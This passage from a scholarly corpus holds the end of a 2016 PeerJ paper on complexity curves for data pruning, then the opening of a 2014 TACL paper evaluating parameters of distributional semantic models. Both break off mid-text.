linear support vector machine; Gaussian NB, naïve Bayes with Gaussian kernel; RF, random forest 100 CART trees; SVC, support vector machine with radial ba- sis function kernel; Tree, CART decision tree; Logit, logistic regression; GBC, gradient boosting classifier with 100 CART trees. adult data is pruned at 33%. CC compression rate is rather stable with only small standard deviation, but PS compression rate is characterised with huge variance. In this regard, complexity curve pruning is preferable as a more stable pruning criterion. In all cases when training a classifier on the unpruned data took more than 10 s, we observed huge speed-ups. With the exception of SVC on led data set, complexity curve pruning performed better than progressive sampling in such cases. Unsurprisingly, real speed-ups were visible only for computationally intensive methods such as Support Vector Machines, Random Forest and Gradient Boosted Decision Trees. For simple methods such as Naïve Bayes, Decision Tree or Logistic Regression, fitting the model on the unpruned data is often faster than applying the pruning strategy. Zubek and Plewczynski (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.76 27/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.76 These results present complexity curve pruning as a reasonable model-free alternative to progressive sampling. It is more stable and often less demanding computationally. It does not require additional convergence detection strategy, which is always an important consideration when applying progressive sampling in practice. What is more, complexity curve pruning can also be easily applied in the context of online learning, when the data is being collected on the fly. After appending a batch of new examples to the data set, Hellinger distance between the old data set and the extended one can be calculated. If the distance is smaller than the chosen threshold, the process of data collection can be stopped. CONCLUSIONS In this article, we introduced a measure of data complexity targeted specifically at data sparsity. This distinguish it from other measures focusing mostly on the shape of optimal decision boundary in classification problems. The introduced measure has a form of graphical plot—complexity curve. We showed that it exhibits desirable properties through a series of experiments on both artificially constructed and real-world data sets. We proved that complexity curve capture non-trivial characteristics of the data sets and is useful for explaining the performance of high-variance classifiers. With the conditional complexity curve it was possible to perform a meaningful analysis even with heavily imbalanced data sets. We then demonstrated how complexity curve can be used in practice for data pruning (reducing the size of training set) and that it is a feasible alternative to progressive sampling technique. This result is immediately applicable to all the situations when data overabundance starts to pose a problem. For instance, it is possible to perform a quick exploration study on a pruned data set before fitting computationally expensive models on the whole set. Pruning results may also provide a suggestion for choosing proper train-test split ratio or number of folds of cross-validation in the evaluation procedure. We argue that new measures of data characteristics, such as complexity curves, are needed to move away from a relatively static view of classification task to a more dynamic one. It is worth to investigate how various algorithms are affected by certain data manipulations; for example, when new data become available or the underlying distribution shifts. This would facilitate the development of more adaptive and universal algorithms capable of working in a dynamically changing environment. Experiments showed that in the presence of large number of redundant attributes not contributing to the classification task complexity curve does not correlate well with classifier performance. It correctly identifies dimensional sparseness of the data, but that is misleading since the actual decision boundary may still be very simple. Because of this, as the next step in our research we plan to apply similar probabilistic approach to measure information content of different attributes in a data set and use that knowledge for performing feature selection. Graphs analogical to complexity curves and generalisation curves would be valuable tools for understanding characteristics of data sets and classification algorithms related to attribute structure. Another limitation our method is the assumption of lack of attributes interdependencies. While the presence of small dependencies does not disrupt the analysis, when strong high Zubek and Plewczynski (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.76 28/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.76 dimensional dependencies are present, the complexity curve does not correlate with classifier performance well. This means that it is infeasible to use for some domains; for example, highly epistatic problems in bioinformatics. Our long-term goal is to gain a better understanding of the impact of data set structure, both in terms of contained examples and attributes, and use that knowledge to build heterogeneous classification ensembles. We hope that a better control over data sets used in experiments will allow to perform a more systematic study of classifier diversity and consensus methods. ADDITIONAL INFORMATION AND DECLARATIONS Funding The study is cofounded by the European Union from resources of the European Social Fund. Project PO KL ‘‘Information technologies: Research and their interdisciplinary applications,’’ Agreement UDA-POKL.04.01.01-00-051/10-00; Polish National Science Centre (grant numbers: 2015/16/T/ST6/00493 to JZ, 2014/15/B/ST6/05082 and 2013/09/B/NZ2/00121 to JZ and DP); EU COST BM1405 and BM1408 actions. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: European Union: UDA-POKL.04.01.01-00-051/10-00. Polish National Science Centre: 2015/16/T/ST6/00493, 2014/15/B/ST6/05082, 2013/09/B/NZ2/00121. EU COST: BM1405, BM1408. Competing Interests The authors declare there are no competing interests. Author Contributions • Julian Zubek conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • Dariusz M. Plewczynski conceived and designed the experiments, analyzed the data, wrote the paper, reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: Associated code is available to download at: https://github.com/zubekj/complexity_curve. (open source Python implementation). Zubek and Plewczynski (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.76 29/32 https://peerj.com https://github.com/zubekj/complexity_curve http://dx.doi.org/10.7717/peerj-cs.76 Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.76#supplemental-information. REFERENCES Alcalá J, Fernández A, Luengo J, Derrac J, García S, Sánchez L, Herrera F. 2011. Keel data-mining software tool: data set repository, integration of algorithms and exper- imental analysis framework. Journal of Multiple-Valued Logic and Soft Computing 17(2–3):255–287. Bohanec M, Rajkovic̆ V. 1988. Knowledge acquisition and explanation for multi- attribute decision. In: Making, 8th international workshop expert systems and their applications. Brent RP. 1973. Algorithms for minimization without derivatives. Mineola: Dover Publications. Choubey SK, Deogun JS, Raghavan VV, Sever H. 1996. A comparison of feature selection algorithms in the context of rough classifiers. In: Proceedings of the fifth IEEE international conference on fuzzy systems, vol. 2. Piscataway: IEEE, 1122–1128. Chvátal V. 1979. The tail of the hypergeometric distribution. Discrete Mathematics 25(3):285–287 DOI 10.1016/0012-365X(79)90084-0. Cieslak DA, Hoens TR, Chawla NV, Kegelmeyer WP. 2011. Hellinger distance decision trees are robust and skew-insensitive. Data Mining and Knowledge Discovery 24(1):136–158 DOI 10.1007/s10618-011-0222-1. Díez-Pastor JF, Rodríguez JJ, García-Osorio CI, Kuncheva LI. 2015. Diversity techniques improve the performance of the best imbalance learning ensembles. Information Sciences 325:98–117 DOI 10.1016/j.ins.2015.07.025. Domingos P. 2000. A Unified bias-variance decomposition for zero-one and squared loss. In: AAAI/IAAI. Palo Alto: AAAI Press, 564–569. Dy JG, Brodley CE. 2004. Feature selection for unsupervised learning. The Journal of Machine Learning Research 5:845–889 DOI 10.1016/j.patrec.2014.11.006. Frank A, Asuncion A. 2010. UCI machine learning repository. Irvine: University of California, Irvine, School of Information and Computer Sciences. Ho TK. 2008. Data complexity analysis: linkage between context and solution in classification. In: Lobo NDV, Kasparis T, Roli F, Kwok JT, Georgiopoulos M, Anagnostopoulos GC, Loog M, eds. Structural, syntactic, and statistical pattern recognition. Lecture notes in computer science, vol. 5342. Berlin Heidelberg: Springer, 1. Ho TK, Basu M. 2002. Complexity measures of supervised classification problems. IEEE Transactions on Pattern Analysis and Machine Intelligence 24(3):289–300 DOI 10.1109/34.990132. Ho TK, Basu M, Law MHC. 2006. Measures of geometrical complexity in classification problems. In: Data complexity in pattern recognition. Berlin Heidelberg: Springer, 1–23. Zubek and Plewczynski (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.76 30/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.76#supplemental-information http://dx.doi.org/10.7717/peerj-cs.76#supplemental-information http://dx.doi.org/10.1016/0012-365X(79)90084-0 http://dx.doi.org/10.1007/s10618-011-0222-1 http://dx.doi.org/10.1016/j.ins.2015.07.025 http://dx.doi.org/10.1016/j.patrec.2014.11.006 http://dx.doi.org/10.1109/34.990132 http://dx.doi.org/10.7717/peerj-cs.76 Hyvärinen A, Oja E. 2000. Independent component analysis: algorithms and applica- tions. Neural Networks 13(4–5):411–430 DOI 10.1016/S0893-6080(00)00026-5. Johnstone IM, Titterington DM. 2009. Statistical challenges of high-dimensional data. Philosophical Transactions of the Royal Society of London A: Mathematical, Physical and Engineering Sciences 367(1906):4237–4253 DOI 10.1098/rsta.2009.0159. Li L, Abu-Mostafa YS. 2006. Data complexity in machine learning. Technical Report. California Institute of Technology, Pasadena. Liu H, Motoda H, Dash M. 1998. A monotonic measure for optimal feature selection. In: Machine learning: ECML-98. Berlin Heidelberg: Springer, 101–106. Luengo J, Herrera F. 2013. An automatic extraction method of the domains of com- petence for learning classifiers using data complexity measures. Knowledge and Information Systems 42(1):147–180 DOI 10.1007/s10115-013-0700-4. Màcia N, Bernadó-Mansilla E, Orriols-Puig A, Kam Ho T. 2013. Learner excellence biased by data set selection: a case for data characterisation and artificial data sets. Pattern Recognition 46(3):1054–1066 DOI 10.1016/j.patcog.2012.09.022. Mantovani RG, Rossi ALD, Vanschoren J, Bischl B, Carvalho ACPLF. 2015. To tune or not to tune: recommending when to adjust SVM hyper-parameters via meta- learning. In: 2015 international joint conference on neural networks (IJCNN), 1–8. Orriols-Puig A, Macià N, Ho TK. 2010. Documentation for the data complexity library in C++. Technical report. La Salle—Universitat Ramon Llull, Barcelona. Available at http://dcol.sourceforge.net/ . Pedregosa F, Varoquaux G, Gramfort A, Michel V, Thirion B, Grisel O, Blondel M, Prettenhofer P, Weiss R, Dubourg V, Vanderplas J, Passos A, Cournapeau D, Brucher M, Perrot M, Duchesnay E. 2011. Scikit-learn: machine learning in python. Journal of Machine Learning Research 12:2825–2830. Provost F, Jensen D, Oates T. 1999. Efficient progressive sampling. In: Proceedings of the fifth ACM SIGKDD international conference on knowledge discovery and data mining, KDD’99. New York: ACM, 23–32. Ratanamahatana CA, Gunopulos D. 2003. Feature selection for the naive bayesian classifier using decision trees. Applied Artificial Intelligence 17(5–6):475–487 DOI 10.1080/713827175. Scott D. 1992. Multivariate density estimation: theory, practice, and visualization. Hobo- ken: Wiley. Skala M. 2013. Hypergeometric tail inequalities: ending the insanity. ArXiv preprint. arXiv:1311.5939. Smith MR, Martinez T, Giraud-Carrier C. 2013. An instance level analysis of data complexity. Machine Learning 95(2):225–256 DOI 10.1007/s10994-013-5422-z. Smith-Miles K, Baatar D, Wreford B, Lewis R. 2014. Towards objective measures of algorithm performance across instance space. Computers & Operations Research 45:12–24 DOI 10.1016/j.cor.2013.11.015. Smith-Miles K, Lopes L. 2012. Measuring instance difficulty for combinatorial optimization problems. Computers & Operations Research 39(5):875–889 DOI 10.1016/j.cor.2011.07.006. Zubek and Plewczynski (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.76 31/32 https://peerj.com http://dx.doi.org/10.1016/S0893-6080(00)00026-5 http://dx.doi.org/10.1098/rsta.2009.0159 http://dx.doi.org/10.1007/s10115-013-0700-4 http://dx.doi.org/10.1016/j.patcog.2012.09.022 http://dcol.sourceforge.net/ http://dx.doi.org/10.1080/713827175 http://arXiv.org/abs/1311.5939 http://dx.doi.org/10.1007/s10994-013-5422-z http://dx.doi.org/10.1016/j.cor.2013.11.015 http://dx.doi.org/10.1016/j.cor.2011.07.006 http://dx.doi.org/10.7717/peerj-cs.76 Thrun SB, Bala JW, Bloedorn E, Bratko I, Cestnik B, Cheng J, Jong KAD, Dzeroski S, Fisher DH, Fahlman SE, Hamann R, Kaufman KA, Keller S, Kononenko I, Kreuziger JS, Michalski RS, Mitchell TA, Pachowicz PW, Vafaie H, Welde WVD, Wenzel W, Wnek J, Zhang J. 1991. The MONK’s problems: a performance comparison of different learning algorithms. Technical Report CMU.-CS-91-197. Carnegie Mellon University. Yin L, Ge Y, Xiao K, Wang X, Quan X. 2013. Feature selection for high-dimensional imbalanced data. Neurocomputing 105:3–11 DOI 10.1016/j.neucom.2012.04.039. Zubek and Plewczynski (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.76 32/32 https://peerj.com http://dx.doi.org/10.1016/j.neucom.2012.04.039 http://dx.doi.org/10.7717/peerj-cs.76 work_5btix32qbfgvriqhr7d64hs5mq ---- A Large Scale Evaluation of Distributional Semantic Models: Parameters, Interactions and Model Selection Gabriella Lapesa2,1 1Universität Osnabrück Institut für Kognitionswissenschaft Albrechtstr. 28, Osnabrück, Germany gabriella.lapesa@fau.de Stefan Evert2 2FAU Erlangen-Nürnberg Professur für Korpuslinguistik Bismarckstr. 6, Erlangen, Germany stefan.evert@fau.de Abstract This paper presents the results of a large-scale evaluation study of window-based Distribu- tional Semantic Models on a wide variety of tasks. Our study combines a broad coverage of model parameters with a model selection methodology that is robust to overfitting and able to capture parameter interactions. We show that our strategy allows us to identify pa- rameter configurations that achieve good per- formance across different datasets and tasks1. 1 Introduction Distributional Semantic Models (DSMs) are em- ployed to produce semantic representations of words from co-occurrence patterns in texts or documents (Sahlgren, 2006; Turney and Pantel, 2010). Build- ing on the Distributional Hypothesis (Harris, 1954), DSMs quantify the amount of meaning shared by words as the degree of overlap of the sets of contexts in which they occur. A widely used approach operationalizes the set of contexts as co-occurrences with other words within a certain window (e.g., 5 words). A window-based DSM can be represented as a co-occurrence matrix in which rows correspond to target words, columns correspond to context words, and cells store the co- occurrence frequencies of target words and context words. The co-occurrence information is usually weighted by some scoring function and the rows of the matrix are normalized. Since the co-occurrence 1The analysis presented in this paper is complemented by supplementary materials, which are available for download at http://www.linguistik.fau.de/dsmeval/. This page will also be kept up to date with the results of follow-up experiments. matrix tends to be very large and sparsely popu- lated, dimensionality reduction techniques are often used to obtain a more compact representation. Lan- dauer and Dumais (1997) claim that dimensionality reduction also improves the semantic representation encoded in the co-occurrence matrix. Finally, dis- tances between the row vectors of the matrix are computed and – according to the Distributional Hy- pothesis – interpreted as a correlate of the semantic similarities between the corresponding target words. The construction and use of a DSM involves many design choices, such as: selection of a source cor- pus, size of the co-occurrence window; choice of a suitable scoring function, possibly combined with an additional transformation; whether to apply dimen- sionality reduction, and the number of reduced di- mensions; metric for measuring distances between vectors. Different design choices – technically, the DSM parameters – can result in quite different sim- ilarities for the same words (Sahlgren, 2006). DSMs have already proven successful in model- ing lexical meaning: they have been applied in Natu- ral Language Processing (Schütze, 1998; Lin, 1998), Information Retrieval (Salton et al., 1975), and Cog- nitive Modeling (Landauer and Dumais, 1997; Lund and Burgess, 1996; Padó and Lapata, 2007; Ba- roni and Lenci, 2010). Recently, the field of Dis- tributional Semantics has moved towards new chal- lenges, such as predicting brain activation (Mitchell et al., 2008; Murphy et al., 2012; Bullinaria and Levy, 2013) and modeling meaning composition (Baroni et al., 2014, and references therein). Despite such progress, a full understanding of the different parameters governing a DSM and their in- fluence on model performance has not been achieved yet. The present paper is a contribution towards this 531 Transactions of the Association for Computational Linguistics, vol. 2, pp. 531–545, 2014. Action Editor: Janyce Wiebe. Submission batch: 3/2014; Revision batch 9/2014; Published 12/2014. c©2014 Association for Computational Linguistics. goal: it presents the results of a large-scale evalua- tion of window-based DSMs on a wide variety of se- mantic tasks. More complex tasks building on distri- butional representations (e.g., vector composition or relational analogies) will also benefit from our find- ings, allowing them to choose optimal parameters for the underlying word-level DSMs. At the level of parameter coverage, this work eval- uates most of the relevant parameters considered in comparable state-of-the-art studies (Bullinaria and Levy, 2007; Bullinaria and Levy, 2012); it also in- troduces an additional one, which has received lit- tle attention in the literature: the index of distribu- tional relatedness, which connects distances in the DSM space to semantic similarity. We compare direct use of distance measures to neighbor rank. Neighbor rank has already been successfully used to model priming effects with DSMs (Hare et al., 2009; Lapesa and Evert, 2013); the present study extends its evaluation to standard tasks. We show that neigh- bor rank consistently improves the performance of DSMs compared to distance, but the degree of this improvement varies from task to task. At the level of task coverage, the present study includes most of the standard datasets used in com- parative studies (Bullinaria and Levy, 2007; Baroni and Lenci, 2010; Bullinaria and Levy, 2012). We consider three types of evaluation tasks: multiple choice (TOEFL test), correlation to human similar- ity ratings, and semantic clustering. At the level of methodology, our work adopts the approach to model selection proposed by Lapesa and Evert (2013), which is described in detail in section 4. Our results show that parameter interactions play a crucial role in determining model performance. This paper is structured as follows. Section 2 briefly reviews state-of-the-art studies on DSM eval- uation. Section 3 describes the experimental setting in terms of tasks and evaluated parameters. Sec- tion 4 outlines our methodology for model selection. In section 5 we report the results of our evaluation study. Finally, section 6 summarizes the main find- ings and sketches ongoing and future work. 2 Previous work In this section we summarize the results of previous evaluation studies of Distributional Semantic Mod- els. Among the existing work on DSM evaluation, we can identify two main types of approaches. One possibility is to evaluate a distributional model with certain new features on a range of tasks, applying little or no parameter tuning, and to com- pare it to competing models; examples are Pado and Lapata’s (2007) Dependency Vectors as well as Baroni and Lenci’s (2010) Distributional Mem- ory. Since both studies focus on testing a single new model with fixed parameters (or a small number of new models), we will not go into further detail con- cerning them. Alternatively, the evaluation may be conducted via incremental tuning of parameters, which are tested sequentially to identify their best perform- ing values on a number of tasks, as has been done by Bullinaria and Levy (2007; 2012), Polajnar and Clark (2014), and Kiela and Clark (2014). Bullinaria and Levy (2007) report on a system- atic study of the impact of a number of parame- ters (shape and size of the co-occurrence window, distance metric, association score for co-occurrence counts) on a number of tasks (including the TOEFL synonym task, which is also evaluated in our study). Evaluated models were based on the British Na- tional Corpus. Bullinaria and Levy (2007) found that vectors scored with Pointwise Mutual Informa- tion, built from very small context windows with as many context dimensions as possible, and using co- sine distance ensured the best performance across all tasks at issue. Bullinaria and Levy (2012) extend the evaluation reported in Bullinaria and Levy (2007). Starting from the optimal configuration identified in the first study, they test the impact of three further parame- ters: application of stop-word lists, stemming, and dimensionality reduction using Singular Value De- composition. DSMs were built from the ukWaC corpus, and evaluated on a number of tasks (includ- ing TOEFL and noun clustering on the dataset of Mitchell et al. (2008), also evaluated in our study). Neither stemming nor the application of stop-word lists resulted in a significant improvement of DSM performance. Positive results were achieved by per- forming SVD dimensionality reduction and discard- ing the initial components of the reduced matrix. Polajnar and Clark (2014) evaluate the impact of context selection (for each target, only the most rel- 532 evant context words are selected, and the remaining vector entries are set to zero) and vector normaliza- tion (used to vary model sparsity and the range of values of the DSM vectors) in standard tasks related to word and phrase similarity. Context selection and normalization improved DSM performance on word similarity and compositional tasks, both with and without SVD. Kiela and Clark (2014) evaluate window-based and dependency-based DSMs on a variety of tasks related to word and phrase similarity. A wide range of parameters are involved in this study: source corpus, window size, number of context dimen- sions, use of stemming, lemmatization and stop- words, similarity metric, score for feature weight- ing. Best results were obtained with large corpora and small window sizes, around 50000 context di- mensions, stemming, Positive Mutual Information, and a mean-adjusted version of cosine distance. Even though we adopt a different approach than these incremental tuning studies, there is consider- able overlap in the evaluated parameters and tasks, which will be pointed out in section 3. An alternative to incremental tuning is the methodology proposed by Lapesa and Evert (2013) and Lapesa et al. (2014). They systematically test a large number of parameter combinations and use linear regression to determine the importance of in- dividual parameters and their interactions. As their evaluation methodology is adopted in the present work and described in more detail in section 4, we will not discuss it here and instead focus on the main results. DSMs are evaluated in the task of modeling semantic priming. This task, albeit not standard in DSM evaluation, is of great interest as priming ex- periments provide a window into the structure of the mental lexicon. Both studies showed that neighbor rank outperforms distance in capturing priming ef- fects. They also found that the scoring function has a crucial influence on model performance and inter- acts strongly with an additional logarithmic transfor- mation. Lapesa et al. (2014) focused on a compari- son of syntagmatic and paradigmatic relations. They found that discarding the initial SVD dimensions is only benefical for certain relations, suggesting that these dimensions may encode syntagmatic informa- tion if larger context windows are used. Concerning the scope of the evaluation, both studies consider a wide range of parameters2 but target only a very spe- cific task. Our study aims at extending their parame- ter set and evaluation methodology to standard tasks. 3 Experimental setting 3.1 Tasks The evaluation of DSMs has been conducted on three standard types of semantic tasks. The first task is a multiple choice setting: distri- butional relatedness between a target word and two or more other words is used to select the best, i.e. most similar candidate. Performance in this task is quantified by the decision accuracy. The evaluated dataset is the well-known TOEFL multiple-choice synonym test (Landauer and Dumais, 1997), which was also included in the studies of Bullinaria and Levy (2007; 2012) and Kiela and Clark (2014). In the second task, we measure the correla- tion between distributional relatedness and native speaker judgments of semantic similarity or related- ness. Following previous studies (Baroni and Lenci, 2010; Padó and Lapata, 2007), performance in this task is quantified in terms of Pearson correlation.3 Evaluated datasets are the Rubenstein and Goode- nough dataset (RG65) of 65 noun pairs (Rubenstein and Goodenough, 1965), also evaluated by Kiela and Clark (2014), and the WordSim-353 dataset (WS353) of 353 noun pairs (Finkelstein et al., 2002), included in the study of Polajnar and Clark (2014). The third evaluation task is noun clustering: distributional similarity between words is used to assign them to a pre-defined number of semantic classes. Performance in this task is quantified in terms of cluster purity. Clustering is performed with an algorithm based on partitioning around medoids (Kaufman and Rousseeuw, 1990, Ch. 2), using the 2The parameter set of Lapesa et al. (2014) fully corresponds to the one used in the present study. 3Some other evaluation studies adopt Spearman’s rank cor- relation ρ , which is more appropriate if there is a non-linear re- lation between distributional relatedness and the human judge- ments. We computed both coefficients in our experiments and decided to report Pearson’s r for three reasons: (i) Baroni and Lenci (2010) already list r scores for a wide range of DSMs in this task; (ii) in most experimental runs, ρ and r values were quite similar, with a tendency for ρ to be slightly lower then r (difference of means RG65: 0.001; WS353: 0.02); (iii) lin- ear regression analyses for ρ and r showed the same trends and patterns for all DSM parameters. 533 R function pam with standard settings.4 Evaluated datasets for the clustering task are the Almuhareb- Poesio set (henceforth, AP) containing 402 nouns grouped into 21 classes (Almuhareb, 2006); the Bat- tig set, containing 83 concrete nouns grouped into 10 classes (Van Overschelde et al., 2004); the ESS- LLI 2008 set, containing 44 concrete nouns grouped into 6 classes;5 and the Mitchell set, containing 60 nouns grouped into 12 classes (Mitchell et al., 2008), also employed by Bullinaria and Levy (2012). 3.2 Parameters DSMs evaluated in this paper belong to the class of window-based models. All models use the same large vocabulary of target words (27522 lemma types), which is based on the vocabulary of Distri- butional Memory (Baroni and Lenci, 2010) and has been extended to cover all items in our datasets. Dis- tributional models were built using the UCS toolkit6 and the wordspace package for R (Evert, 2014). The following parameters have been evaluated:7 • Source Corpus (abbreviated in the plots as cor- pus): the corpora from which we compiled our DSMs differ in both size and quality, and they rep- resent standard choices in DSM evaluation. Eval- uated corpora in this study are: British National Corpus8; ukWaC; WaCkypedia EN9; • Context window: – Direction* (win.direction): we collected co- occurrence counts both using a directed win- dow (i.e., separate co-occurrence counts for 4Other clustering studies have often been carried out us- ing the CLUTO toolkit (Karypis, 2003) with standard settings, which corresponds to spectral clustering of the distributional vectors. Unlike pam, which operates on a pre-computed dis- similarity matrix, CLUTO cannot be used to test different dis- tance measures or neighbor rank. Comparative clustering ex- periments showed no substantial differences for cosine similar- ity; in the rank-based setting, pam consistently outperformed CLUTO clustering. 5http://wordspace.collocations.de/doku.php/data: esslli2008:concrete nouns categorization 6http://www.collocations.de/software.html 7Parameters also evaluated by Bullinaria and Levy (2007; 2012), albeit with a different range of values, are marked with an asterisk (*); those evaluated by Kiela and Clark (2014) and/or Polajnar and Clark (2014) are marked with a dagger (†). 8http://www.natcorp.ox.ac.uk/ 9Both ukWaC and WaCkypedia EN are available from http: //wacky.sslmit.unibo.it/doku.php?id=corpora. context words to the left and to the right of the target) and an undirected window (no distinc- tion between left and right context); – Size (win.size)*†: we expect this parameter to be crucial as it determines the amount of shared context involved in the computation of similar- ity. We tested windows of 1, 2, 4, 8, and 16 words to the left and right of the target, limited by sentence boundaries; • Context selection: Context words are filtered by part-of-speech (nouns, verbs, adjectives, and ad- verbs). From the full co-occurrence matrix, we further select dimensions (i.e., columns, corre- sponding to context words) according to the fol- lowing two parameters: – Criterion for context selection (criterion): marginal frequency; number of nonzero co- occurrence counts; – Threshold for context selection (con- text.dim)*†: from the context dimensions ranked according to this criterion, we select the top 5000, 10000, 20000, 50000 or 100000 dimensions; • Score for feature weighting (score)*†: we com- pare plain co-occurrence frequency to tf.idf and to the following association measures: Dice coeffi- cient; simple log-likelihood; Mutual Information (MI); t-score; z-score;10 • Feature transformation (transformation): to re- duce the skewness of feature scores, it is possible to apply a transformation function. We evaluate square root, sigmoid (tanh) and logarithmic trans- formation vs. no transformation. 10See Evert (2008) for a thorough description of the asso- ciation measures and details on their calculation (Fig. 58.4 on p. 1225 and Fig. 58.9 on p. 1235). We selected these measures because they have widely been used in previous work on DSMs (tf.idf, MI and log-likelihood) or are popular choices for the identification of multiword expressions. Based on statistical hy- pothesis tests, log-likelihood, t-score and z-score measure the significance of association between a target and feature term; MI shows how much more frequently they co-occur than ex- pected by chance; and Dice captures the mutual predictability of target and feature term. Note that we compute sparse ver- sions of the association measures with negative values clamped to zero in order to preserve the sparseness of the co-occurrence matrix. For example, our MI measure corresponds to Positive MI in the other evaluation studies. 534 • Distance metric (metric)*†: cosine distance (i.e., angle between vectors); Manhattan distance11; • Dimensionality reduction: we optionally apply Singular Value Decomposition to 1000 dimen- sions, using randomized SVD (Halko et al., 2009) for performance reasons. For the SVD-based models, there are two additional parameters: – Number of latent dimensions (red.dim): out of the 1000 SVD dimensions, we select the first 100, 300, 500, 700, 900 dimensions (i.e. those with the largest singular values); – Number of skipped dimensions (dim.skip): when selecting the reduced dimensions, we ex- clude the first 0, 50 or 100 dimensions. This parameter has already been evaluated by Bulli- naria and Levy (2012), who achieved best per- formance by discarding the initial components of the reduced matrix, i.e., those with the high- est variance. • Index of distributional relatedness (rel.index). Given two words a and b represented in a DSM, we consider two alternative ways of quantify- ing the degree of relatedness between a and b. The first option (and standard in DSM model- ing) is to compute the distance (cosine or Man- hattan) between the vectors of a and b. The al- ternative choice, proposed in this work, is based on neighbor rank. Neighbor rank has already been successfully used for capturing priming ef- fects (Hare et al., 2009; Lapesa and Evert, 2013; Lapesa et al., 2014) and for quantifying the se- mantic relatedness between derivationally related words (Zeller et al., 2014); however, its perfor- mance on standard tasks has not been tested yet. For the TOEFL task, we compute rank as the po- sition of the target among the nearest neighbors of each synonym candidate.12 For the correla- 11In this study, the range of evaluated metrics is restricted to cosine vs. manhattan for a number of reasons: (i) cosine is con- sidered a standard choice in DSM modeling and is adopted by most evaluation studies (Bullinaria and Levy, 2007; Bullinaria and Levy, 2012; Polajnar and Clark, 2014); (ii) for our normal- ized vectors, Euclidean distance is fully equivalent to cosine; (iii) preliminary experiments with the maximum distance mea- sure resulted in very low performance. 12Note that using the positions of the synonym candidates among the neighbors of the target would have been equivalent to direct use of the distance measure, since the transformation from distance to rank is monotonic in this case. tion and clustering tasks, we compute a symmetric rank measure as the average of log rank(a,b) and log rank(b,a). An exploration of the effects of di- rectionality on the prediction of similarity ratings and its use in clustering tasks (i.e., experiments involving rank(a,b) and rank(b,a) as indexes of relatedness) is left for future work. 4 Model selection As has already been pointed out in the introductory section, one of the main open issues in DSM eval- uation is the need for a systematic investigation of the interactions between DSM parameters. Another issue that large-scale evaluation studies face is over- fitting: if a large number of models (i.e. parameter combinations) is evaluated, it makes little sense to look at the best model (i.e. the best parameter com- bination), which will be subject to heavy overfit- ting, especially on small datasets such as TOEFL. The methodology for model selection applied in this work successfully addresses both issues. In our evaluation study, we tested all possible combinations of the parameters described in sec- tion 3.2. This resulted in a total of 537600 model runs (33600 in the unreduced setting, 504000 in the dimensionality-reduced setting). The models were generated and evaluated on a large HPC cluster within approximately 5 weeks. Following Lapesa and Evert (2013), DSM pa- rameters are considered predictors of model perfor- mance: we analyze the influence of individual pa- rameters and their interactions using general linear models with performance (accuracy, correlation, pu- rity) as a dependent variable and the model parame- ters as independent variables, including all two-way interactions. More complex interactions are beyond the scope of this paper and are left for future work. Analysis of variance – which is straightforward for our full factorial design – is used to quantify the im- portance of each parameter or interaction. Robust optimal parameter settings are identified with the help of effect displays (Fox, 2003), which show the partial effect of one or two parameters by marginal- izing over all other parameters. Unlike coefficient estimates, they allow an intuitive interpretation of the effect sizes of categorical variables irrespective of the dummy coding scheme used. 535 5 Results This section reports the results of the modeling ex- periments outlined in section 3. Table 1 summarizes the evaluation results: for each dataset, we report minimum, maximum and mean performance, com- paring unreduced and reduced runs. The column Difference of Means shows the average difference in performance between an unreduced model and its reduced counterpart (with dimensionality reduction parameters set to the values of the general best set- ting identified in section 5.5) and the p-value13 of a Wilcoxon signed rank test with continuity correc- tion.It is evident that dimensionality reduction im- proves model performances for all datasets14. Dataset Unreduced Reduced Difference Min Max Mean Min Max Mean of Means TOEFL 25.0 87.5 63.9 18.7 98.7 64.4 −4.626*** RG65 0.01 0.88 0.59 0.00 0.89 0.63 −0.073*** WS353 0.00 0.73 0.39 0.00 0.73 0.43 −0.074*** AP 0.15 0.73 0.56 0.13 0.76 0.54 0.004n.s. BATTIG 0.28 0.99 0.77 0.23 0.99 0.78 −0.037*** ESSLLI 0.32 0.93 0.72 0.32 0.98 0.72 −0.003* MITCH. 0.26 0.97 0.68 0.27 0.97 0.69 −0.031*** Table 1: Summary of performance While the improvements are only minimal in some cases, dimensionality reduction never has a detrimental effect while offering practical advan- tages in memory usage and computation speed. Therefore, in our analysis, we focus on the runs in- volving dimensionality reduction. In the following subsections, we present detailed results for each of the three tasks. In each case, we first discuss the im- pact of DSM parameters on performance, and then describe the optimal parameter values. 5.1 TOEFL In the TOEFL task, the linear model achieves an ad- justed R2 of 89%, showing that it explains the influ- ence of model parameters on TOEFL accuracy very well. Figure 1 displays the ranking of the evaluated parameters according to their importance in a fea- ture ablation setting. The R2 values in the plots re- fer to the proportion of variance explained by the re- spective parameter together with all its interactions, 13* = p < 0.05; *** = p < 0.001; n.s. = not significant. 14Difference of means and Wilcoxon p-value on Spear- man’s rho for ratings datasets: RG65, −0.061***; WS353, −0.091***. corresponding to the reduction in adjusted R2 if this parameter is left out. We do not rely on significance values for model selection because, given the large number of measurements, virtually all parameters have a highly significant effect. criterion rel.index win.direction win.size context.dim corpus red.dim dim.skip transformation score metric 0 10 20 30 Partial R2 TOEFL Figure 1: TOEFL, parameters and feature ablation Table 2 reports all parameter interactions for the TOEFL task that explain more than 0.5% of the total variance (i.e. R2 ≥ 0.5%), as well as the correspond- ing degrees of freedom (df) and R2. Interaction df R2 score:transf 18 7.42 metric:dim.skip 2 4.44 score:metric 6 1.77 metric:context.dim 4 0.98 win.size:transf 12 0.91 corpus:score 12 0.84 score:context.dim 24 0.64 metric:red.dim 4 0.63 Table 2: TOEFL task: interactions, R2 On the basis of their influence in determining model performance, we can identify three parame- ters that are crucial for the TOEFL task, and which will also turn out to be very influential in the other tasks at issue: distance metric, feature score and 